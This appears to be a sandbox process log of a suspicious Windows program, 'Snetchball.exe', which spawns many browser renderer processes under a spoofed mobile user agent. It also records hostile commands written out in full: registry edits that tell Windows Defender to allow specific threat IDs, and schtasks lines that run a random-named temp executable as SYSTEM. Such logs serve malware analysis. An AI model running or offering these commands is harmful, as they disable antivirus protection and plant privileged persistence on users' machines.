"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --mojo-platform-channel-handle=3816 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\ZKmFrxgx\UzcFeLB.exe
C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\ZKmFrxgx\UzcFeLB.exe z0 /S
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --mojo-platform-channel-handle=3964 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --mojo-platform-channel-handle=4128 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --mojo-platform-channel-handle=3852 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --mojo-platform-channel-handle=3220 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --mojo-platform-channel-handle=4116 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --mojo-platform-channel-handle=3156 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --mojo-platform-channel-handle=3816 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --mojo-platform-channel-handle=4112 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "FPIEUdZLMYPzsiUNM" /SC once /ST 03:15:03 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\OZhxUQi.exe\" Wy /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "FPIEUdZLMYPzsiUNM"
C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\OZhxUQi.exe
C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\OZhxUQi.exe Wy /S
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5316 -ip 5316
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5316 -s 608
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --mojo-platform-channel-handle=4020 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --mojo-platform-channel-handle=4176 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --mojo-platform-channel-handle=4140 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --mojo-platform-channel-handle=3720 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --mojo-platform-channel-handle=3796 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --mojo-platform-channel-handle=4264 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bEtnHIcecDUtXwQuWS"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 13; TECNO BG6 Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/126.0.6478.134 Mobile Safari/537.36 [FBAN/EMA;FBLC/fr_FR;FBAV/380.0.0.14.112;FBDM/DisplayMetrics{density=2.0, width=720, height=1436, scaledDensity=2.0, xdpi=268.941, ydpi=269.373};]" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --mojo-platform-channel-handle=1932 --field-trial-handle=2884,i,16799167902381283152,17465296216559232583,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
